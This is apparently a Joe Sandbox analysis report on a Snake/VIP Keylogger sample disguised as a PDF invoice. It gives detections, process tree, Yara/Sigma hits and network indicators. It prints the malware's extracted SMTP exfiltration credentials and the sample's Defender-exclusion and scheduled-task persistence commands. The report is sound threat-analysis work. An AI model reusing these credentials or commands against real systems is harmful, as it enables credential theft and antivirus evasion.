Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Proforma Invoice_21-1541 And Packing List.pdf.exe

Overview

General Information

Sample name:Proforma Invoice_21-1541 And Packing List.pdf.exe
Analysis ID:1535758
MD5:735a7df205549792227de19741161bf4
SHA1:eaf1a198d5d1b3fcb9f800d904fb77fcf292dd4f
SHA256:8a48ce8db35cc289949562cae156fce70a8e7f913b35515bce4cdc2741152b8b
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Proforma Invoice_21-1541 And Packing List.pdf.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe" MD5: 735A7DF205549792227DE19741161BF4)
    • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7896 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vrhZELiHpiub.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe MD5: 735A7DF205549792227DE19741161BF4)
    • schtasks.exe (PID: 7248 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vrhZELiHpiub.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe" MD5: 735A7DF205549792227DE19741161BF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.4175064237.0000000000423000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
  • 0xc3cb:$a1: get_encryptedPassword
  • 0xc6d8:$a2: get_encryptedUsername
  • 0xc1e9:$a3: get_timePasswordChanged
  • 0xc2e4:$a4: get_passwordField
  • 0xc3e1:$a5: set_encryptedPassword
  • 0xda72:$a7: get_logins
  • 0xd9d5:$a10: KeyLoggerEventArgs
  • 0xd63a:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 23 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2b7cb:$a1: get_encryptedPassword
                • 0x2bad8:$a2: get_encryptedUsername
                • 0x2b5e9:$a3: get_timePasswordChanged
                • 0x2b6e4:$a4: get_passwordField
                • 0x2b7e1:$a5: set_encryptedPassword
                • 0x2ce72:$a7: get_logins
                • 0x2cdd5:$a10: KeyLoggerEventArgs
                • 0x2ca3a:$a11: KeyLoggerEventArgsEventHandler
                0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39560:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38c03:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38e60:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3983f:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 25 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", CommandLine: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", CommandLine|base64offset|contains: "{_, Image: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, NewProcessName: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", ProcessId: 7576, ProcessName: Proforma Invoice_21-1541 And Packing List.pdf.exe
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", ParentImage: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, ParentProcessId: 7576, ParentProcessName: Proforma Invoice_21-1541 And Packing List.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", ProcessId: 7772, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", ParentImage: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, ParentProcessId: 7576, ParentProcessName: Proforma Invoice_21-1541 And Packing List.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", ProcessId: 7772, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe, ParentImage: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe, ParentProcessId: 8164, ParentProcessName: vrhZELiHpiub.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp", ProcessId: 7248, ProcessName: schtasks.exe
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, Initiated: true, ProcessId: 8080, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49787
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", ParentImage: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, ParentProcessId: 7576, ParentProcessName: Proforma Invoice_21-1541 And Packing List.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp", ProcessId: 7960, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", ParentImage: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, ParentProcessId: 7576, ParentProcessName: Proforma Invoice_21-1541 And Packing List.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe", ProcessId: 7772, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe", ParentImage: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe, ParentProcessId: 7576, ParentProcessName: Proforma Invoice_21-1541 And Packing List.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp", ProcessId: 7960, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T09:44:44.393209+020028033053Unknown Traffic192.168.2.449745188.114.96.3443TCP
                2024-10-17T09:44:45.872270+020028033053Unknown Traffic192.168.2.449749188.114.96.3443TCP
                2024-10-17T09:44:47.884709+020028033053Unknown Traffic192.168.2.449761188.114.96.3443TCP
                2024-10-17T09:44:50.190043+020028033053Unknown Traffic192.168.2.449772188.114.96.3443TCP
                2024-10-17T09:44:51.672838+020028033053Unknown Traffic192.168.2.449777188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449752193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449747193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449753193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449755193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449756193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449754193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449774193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449746193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449751193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449765193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449775193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449757193.122.130.080TCP
                2024-10-17T09:44:36.922055+020028032742Potentially Bad Traffic192.168.2.449758193.122.130.080TCP
                2024-10-17T09:44:42.156482+020028032742Potentially Bad Traffic192.168.2.449739193.122.130.080TCP
                2024-10-17T09:44:43.468988+020028032742Potentially Bad Traffic192.168.2.449739193.122.130.080TCP
                2024-10-17T09:44:43.687732+020028032742Potentially Bad Traffic192.168.2.449739193.122.130.080TCP
                2024-10-17T09:44:45.160535+020028032742Potentially Bad Traffic192.168.2.449748193.122.130.080TCP
                2024-10-17T09:44:46.062835+020028032742Potentially Bad Traffic192.168.2.449750193.122.130.080TCP
                2024-10-17T09:44:47.156550+020028032742Potentially Bad Traffic192.168.2.449750193.122.130.080TCP
                2024-10-17T09:44:48.606725+020028032742Potentially Bad Traffic192.168.2.449762193.122.130.080TCP
                2024-10-17T09:44:50.953371+020028032742Potentially Bad Traffic192.168.2.449776193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeAvira: detection malicious, Label: HEUR/AGEN.1309880
                Found malware configuration
                Source: 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeReversingLabs: Detection: 65%
                Multi AV Scanner detection for submitted file
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49760 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: eIf.pdbSHA256 source: Proforma Invoice_21-1541 And Packing List.pdf.exe, vrhZELiHpiub.exe.0.dr
                Source: Binary string: System.Windows.Forms.pdb source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1769386708.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1769386708.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1769386708.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: eIf.pdb source: Proforma Invoice_21-1541 And Packing List.pdf.exe, vrhZELiHpiub.exe.0.dr
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_0B069080
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_0B069090
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0269FA11h9_2_0269F76C
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 06580D0Dh9_2_06580B30
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 06581697h9_2_06580B30
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658F661h9_2_0658F3B8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 06582819h9_2_06582568
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 065831E0h9_2_06582DC8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658E501h9_2_0658E258
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658E0A9h9_2_0658DE00
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658E959h9_2_0658E6B0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658F209h9_2_0658EF60
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658EDB1h9_2_0658EB08
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06580040
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658FAB9h9_2_0658F810
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658D3A1h9_2_0658D0F8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658CF49h9_2_0658CCA0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658D7F9h9_2_0658D550
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 065831E0h9_2_0658310E
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 065831E0h9_2_06582DC2
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 4x nop then jmp 0658DC51h9_2_0658D9A8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_0111F360
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_0111F993
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_0111FB73
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551DFE1h13_2_0551DD38
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551E891h13_2_0551E5E8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551E439h13_2_0551E190
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 05512870h13_2_05512458
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551021Dh13_2_05510040
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 05510BA7h13_2_05510040
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 05512870h13_2_0551244E
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551D2D9h13_2_0551D030
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551DB89h13_2_0551D8E0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551D731h13_2_0551D488
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551F9F1h13_2_0551F748
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551C5D1h13_2_0551C328
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551CE81h13_2_0551CBD8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 05512870h13_2_0551279E
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551CA29h13_2_0551C780
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551ECE9h13_2_0551EA40
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551F599h13_2_0551F2F0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 0551F141h13_2_0551EE98
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 4x nop then jmp 05512131h13_2_05511E80

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.4:49787 -> 208.91.199.223:587
